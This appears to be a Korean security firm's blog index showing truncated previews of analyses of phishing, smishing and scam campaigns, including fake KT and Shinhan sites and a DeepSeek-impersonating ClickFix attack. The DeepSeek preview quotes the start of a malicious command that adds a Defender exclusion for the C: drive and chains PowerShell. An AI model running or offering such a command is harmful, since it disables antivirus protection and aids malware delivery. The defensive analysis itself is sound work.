추운 겨울이 지나고 싱그러운 봄이 오면 여기 저기서 결혼 소식을 알려옵니다.이런 시기적 특성을 노리는 피싱 공격 또한 해마다 반복적으로 발생하는데요. 반복 발생하는 피싱·스미싱 유형 중의 하나가 ‘결혼 첩청장 사기’입니다. 2025년 봄철에도 결혼식 청첩장을 위장한 스미싱 사기가 기승을 부리고 있습니다. 사기범들은 지인을 사칭하여 모바일 청첩장 링크를 문자 또는 SNS 메세지로 보내고, 이를 클릭하면 악성 앱이 설치되어 개인정보와 금융정보가 탈취되는 방식입니다. 최근 대표적인 피해사례로...60대 김 모 씨는 지인으로부터 모바일 청첩장 링크를 문자로 받았습니다. 평소 알고 지내던 사람의 이름으로 온 문자였기에 의심 없이 링크를 클릭했지만, 이후 스마트폰이 오작동하며 금융 앱에 접속할 수 없는 상태가 되었..

국내 대표 통신사 KT를 사칭한 피싱 사이트 발견공식 KT 웹사이트를 모방하여 유사하게 만든 가짜 웹사이트로 현혹피싱 사이트에서 사용자의 카드 결제 정보 입력 유도 후 탈취 1. 분석 개요 최근 국내 대표 통신사인 KT를 사칭한 피싱 사이트가 발견되고 있다.발견된 피싱 사이트는 KT의 높은 기업 신뢰도를 이용하여 사용자들을 속이는 스푸핑(spoofing) 기법이 활용되었다.피싱 사이트는 유명 기업 및 브랜드, 공신력 있는 공공기관, 금융사 등의 웹사이트를 모방하여 유사하게 만든 가짜 사이트로, 사용자들의 개인 신상 정보나 금융 거래 정보를 탈취하여 악의적인 목적으로 사용하고자 만들어진다. 대표적인 예로, 아이디와 비밀번호를 입력하도록 유도하는 가짜 로그인 페이지와 신용카드 정보나 은행 계좌 번호를 입..

1. 분석 개요​국내외 자동차 판매량이 꾸준히 증가함에 따라 이를 활용한 다양한 이벤트와 프로모션도 활발히 진행되고 있다.하지만 이러한 흐름을 악용해, 피싱 사이트들이 실제 응모 사이트처럼 정교하게 제작되어 이용자들의 개인정보를 탈취하는 사례가 발생하고 있다.이번 게시글에서는 이러한 피싱 사이트들이 정상적인 사이트와 얼마나 유사하게 구성되어 있는지, 그리고 어떻게 개인정보를 탈취하는지에 대해 자세히 살펴보고자 한다. 2. 피싱 사이트 분석 위 '그림1' 과 '그림 2'는 피싱 사이트와 공식 사이트의 화면을 비교해 보았다.두 사이트 모두 흰색 배경에, 주요 문구는 파란색 사각형 안에 흰색 글씨로 표기되어 있어 겉보기에는 매우 유사하게 보인다. 이러한 디자인 요소로 인해, 사용자들은 세심히 확인하지 않으..

1. 분석 개요​트럼프 행정부의 관세정책 등으로 국제경제의 불확실성이 높아진 상황을 틈타 증권사 혹은 금융사를 사칭한 피싱 사이트가 급격히 증가하고 있어 투자자들의 각별한 주의가 요구된다. 이러한 피싱 사이트는 투자자의 불안 심리를 악용해 가짜 웹사이트 링크를 유포하거나 개인정보를 탈취하는 등 심각한 금융 피해를 유발할 수 있다. 이에 따라, 이번 게시글에서는 “신한투자증권” 피싱 사이트를 선정하여 해당 사이트가 가진 특징과 피싱 및 사기 수법, 개인정보 탈취 방법 등에 대해 기술할 예정이다. 2. 신한투자증권 피싱 사이트 컨텐츠 분석 해당 사이트 메인 화면 좌측 상단에는 실제 신한투자증권과 유사한 로고가 배치되어 있으며, 주요 메뉴로는 '해외송금'과 '외화 Buy & Sell'과 같은 서비스를 강조..

1. 분석 개요​최근 유튜브 쇼츠, 인스타 릴스 등에서 간단한 부업으로 돈을 벌 수 있다는 식의 홍보글을 심심치 않게 찾아볼 수 있다. 특히나 간단한 일을 하고도 하루에 많은 돈을 벌 수 있다는 식의 홍보글로 자신들의 웹사이트나 카카오톡 오픈채팅방으로 유도하고 있다. 이번 포스팅에서는 직접 채팅으로 대화하며 어떤 방식으로 금전적 피해를 입히는지에 대해 분석한 사기 방식을 서술한다. 2. 유도 방식​먼저 SNS의 숏폼 영상에서 홍보하는 부업 소개 게시글에서 부업 신청 사이트에 접속한다. 그리고 카카오톡 ID를 입력하고 기다리면 채팅을 받을 수 있다. 위와 같이 대화를 시작하면 사용자에 맞는 부업을 추천해주겠다며 선택지를 제시한다. 자세히 읽어보면 간단한 시청만으로 8000원까지 벌 수 있는 종목과 손으..

목 차 1. 감염 과정 2. 파일 정보 3. 도식도 4. yoda.exe 상세 분석 5. 악성코드 분석 요약 6. 결론 1. 감염 과정​▶ 피해자는 https://deepseek*******.top 등 DeepSeek 사칭 피싱 사이트에 접속하게 됩니다. ▶ 해당 피싱 사이트는 사용자를 속이기 위해 CAPTCHA 인증 페이지로 위장된 화면으로 유도합니다. ▶ 해당 피싱 사이트는 사용자가 특정 버튼이나 링크를 클릭할 경우, 클립보드에 악성 스크립트가 자동으로 복사되도록 설계되어 있습니다. (ClickFix 방식) ▶ 클립보드의 스크립트는 아래와 같습니다. cmd /c "powershell Add-MpPreference -ExclusionPath 'C:\' && timeout 2 && powershell ..

1. 분석 개요​매년 봄이 다가오는 3월부터는 새 학기, 결혼식, 이사, 여행 등으로 사람들의 소통과 활동이 많아지기 시작한다. 그리고 이런 시기적 특성을 노리는 피싱 공격 또한 해마다 반복적으로 발생한다. 반복 발생하는 피싱 유형 중의 하나가 ‘경찰청 사칭 피싱·스미싱’이다. 경찰청 사칭 수법은 전형적이고 고착화된 피싱 수법이지만, 경찰의 연락은 일반적으로 긴장감을 유발하며 개인의 판단력까지 흐리게 한다. 올해도 이런 심리를 이용해 더욱 교묘해진 사기 수법으로 악성 어플리케이션(앱)을 설치/유도하는 피싱 사례가 증가하고 있다. 이에 이번 보고서를 통해 악성 앱 유포 경로 분석해 보고 피해를 예방해 보고자 한다. 2. 상세분석​● 피싱 사이트 유포 방식 해당 피싱 사기는 주로 휴대폰 문자 메시지(MMS..

1. 분석 개요​3월 초, 누리랩 임원의 사내 메일함(하이웍스 그룹웨어)에 의심스러운 이메일이 수신되었다.이 이메일은 국세청 홈택스 서비스를 사칭하여 전자세금계산서 확인을 명목으로 첨부 파일 열람을 유도하는 피싱 메일이었다. 해당 피싱 메일의 목적은 하이웍스 계정 탈취하는 것이다. 하이웍스(Hiworks)는 국내 기업들이 업무용으로 사용하는 그룹웨어 서비스로, 업무 공유 및 이메일 송수신에 널리 활용되고 있다. 본 분석 보고서에서는 이 피싱 메일이 하이웍스 계정을 탈취하는 과정과 그 위험성에 대해 분석하고자 한다. 2. 피싱 메일 분석​본 메일은 [그림 1]처럼 국세청 홈택스 서비스를 가장하여, 전자세금계산서 확인을 위해 피해자에게 첨부 파일을 열어보도록 유도한다. 첨부 파일은 HTML 파일이며, 브..